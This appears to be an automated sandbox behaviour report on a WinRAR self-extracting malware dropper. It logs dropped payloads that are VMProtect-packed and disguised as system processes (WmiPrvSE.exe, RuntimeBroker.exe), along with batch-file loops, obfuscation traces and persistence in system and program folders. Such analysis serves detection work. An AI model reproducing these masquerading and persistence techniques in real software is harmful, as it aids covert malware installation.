Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NqvJKoZOIs.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rq9fLK5Nyj.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Vs6Gb3dzjw.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\diBg3fIzhe.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nBqbaEi3SG.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\g3J0tdP0ue.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Directory created: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Directory created: C:\Program Files\Common Files\Adobe\296c159f5c41a5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Directory created: C:\Program Files\Windows Sidebar\RuntimeBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Directory created: C:\Program Files\Windows Sidebar\9e8d7a4ca61bd9	Jump to behavior

Source: JAJL2EYBPH.exe

Static file information: File size 2320194 > 1048576

Source: JAJL2EYBPH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: JAJL2EYBPH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: JAJL2EYBPH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: JAJL2EYBPH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: JAJL2EYBPH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: JAJL2EYBPH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: JAJL2EYBPH.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: JAJL2EYBPH.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: JAJL2EYBPH.exe, work.exe.0.dr
Source:	Binary string: *m.pdb source: WmiPrvSE.exe, 00000009.00000002.1804469408.000000001BB08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: s\dll\System.pdb$ source: WmiPrvSE.exe, 0000001B.00000002.2158498353.000000001B680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdbB- source: WmiPrvSE.exe, 00000020.00000002.2262813857.000000001BE64000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: WmiPrvSE.exe, 0000003A.00000002.2764366926.000000001B66E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dows\dll\System.pdbS-7 source: WmiPrvSE.exe, 00000016.00000002.2034484726.000000001B01C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dows\dll\System.pdb source: WmiPrvSE.exe, 0000001B.00000002.2158498353.000000001B680000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2262813857.000000001BE64000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: (@dows\dll\System.pdb source: WmiPrvSE.exe, 0000002F.00000002.2553710900.000000001B64C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdb source: WmiPrvSE.exe, 0000003A.00000002.2764366926.000000001B67C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: runas.pdb source: WmiPrvSE.exe, 0000001B.00000002.2157976799.000000001B620000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WmiPrvSE.exe, 0000003A.00000002.2764366926.000000001B66E000.00000004.00000020.00020000.00000000.sdmp

Source: JAJL2EYBPH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: JAJL2EYBPH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: JAJL2EYBPH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: JAJL2EYBPH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: JAJL2EYBPH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp1

File is packed with WinRar

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4912265

Jump to behavior

PE file contains sections with non-standard names

Source: JAJL2EYBPH.exe	Static PE information: section name: .didat
Source: work.exe.0.dr	Static PE information: section name: .didat
Source: pfwa.exe.3.dr	Static PE information: section name: .vmp0
Source: pfwa.exe.3.dr	Static PE information: section name: .vmp1
Source: RuntimeBroker.exe.4.dr	Static PE information: section name: .vmp0
Source: RuntimeBroker.exe.4.dr	Static PE information: section name: .vmp1
Source: WmiPrvSE.exe.4.dr	Static PE information: section name: .vmp0
Source: WmiPrvSE.exe.4.dr	Static PE information: section name: .vmp1
Source: QmitaxvEcgoLLOqeIEyLx.exe.4.dr	Static PE information: section name: .vmp0
Source: QmitaxvEcgoLLOqeIEyLx.exe.4.dr	Static PE information: section name: .vmp1
Source: QmitaxvEcgoLLOqeIEyLx.exe0.4.dr	Static PE information: section name: .vmp0
Source: QmitaxvEcgoLLOqeIEyLx.exe0.4.dr	Static PE information: section name: .vmp1

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BA07F0 push ecx; ret	0_2_00BA0803
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B9FEFC push eax; ret	0_2_00B9FF1A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A007F0 push ecx; ret	3_2_00A00803
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009FFEFC push eax; ret	3_2_009FFF1A
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_009A8A00 push 0000007Dh; iretd	4_2_009A8A04
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4FEA push edx; ret	4_2_00007FFD9B8A4FF3
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4E15 push esp; ret	4_2_00007FFD9B8A4E16
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4200 pushad ; ret	4_2_00007FFD9B8A4201
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A3B74 push ss; ret	4_2_00007FFD9B8A3B77
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4D97 push esp; ret	4_2_00007FFD9B8A4D98
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A55A9 push esp; iretd	4_2_00007FFD9B8A55D9
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4BD1 push esi; ret	4_2_00007FFD9B8A4BD2
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4CFA push ebp; ret	4_2_00007FFD9B8A4CFE
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A431B push 0000005Fh; ret	4_2_00007FFD9B8A4324
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4B13 push edi; ret	4_2_00007FFD9B8A4B14
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A512D push ecx; ret	4_2_00007FFD9B8A5131
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4F41 push ebx; ret	4_2_00007FFD9B8A4F45
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4C75 push esi; ret	4_2_00007FFD9B8A4C76
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A5072 push edx; ret	4_2_00007FFD9B8A5073
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A5265 push eax; ret	4_2_00007FFD9B8A5266
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4293 push es; iretd	4_2_00007FFD9B8A4294
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A428B pushad ; ret	4_2_00007FFD9B8A428C
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A4EA2 push ebx; ret	4_2_00007FFD9B8A4EA3
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA55A9 push esp; iretd	9_2_00007FFD9BAA55D9
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA4293 push es; iretd	9_2_00007FFD9BAA4294
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BCEA7F8 push ebx; retf 5F2Bh	9_2_00007FFD9BCEB50A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BCEA7F0 push ebx; retf 5F2Bh	9_2_00007FFD9BCEB50A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD55A9 push esp; iretd	15_2_00007FFD9BAD55D9
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD4293 push es; iretd	15_2_00007FFD9BAD4294
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BC2220C push ss; iretd	15_2_00007FFD9BC2222A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BC22F0C push eax; ret	15_2_00007FFD9BC22F39

Source: pfwa.exe.3.dr	Static PE information: section name: .vmp1 entropy: 7.054759142570995
Source: RuntimeBroker.exe.4.dr	Static PE information: section name: .vmp1 entropy: 7.054759142570995
Source: WmiPrvSE.exe.4.dr	Static PE information: section name: .vmp1 entropy: 7.054759142570995
Source: QmitaxvEcgoLLOqeIEyLx.exe.4.dr	Static PE information: section name: .vmp1 entropy: 7.054759142570995
Source: QmitaxvEcgoLLOqeIEyLx.exe0.4.dr	Static PE information: section name: .vmp1 entropy: 7.054759142570995

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe

File written: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe

Jump to behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows\twain_32\WmiPrvSE.exe

Drops PE files

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File created: C:\Users\Public\Music\QmitaxvEcgoLLOqeIEyLx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File created: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File created: C:\Program Files\Windows Sidebar\RuntimeBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File created: C:\Windows\twain_32\WmiPrvSE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File created: C:\Recovery\QmitaxvEcgoLLOqeIEyLx.exe	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe

File created: C:\Windows\twain_32\WmiPrvSE.exe

Jump to dropped file

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
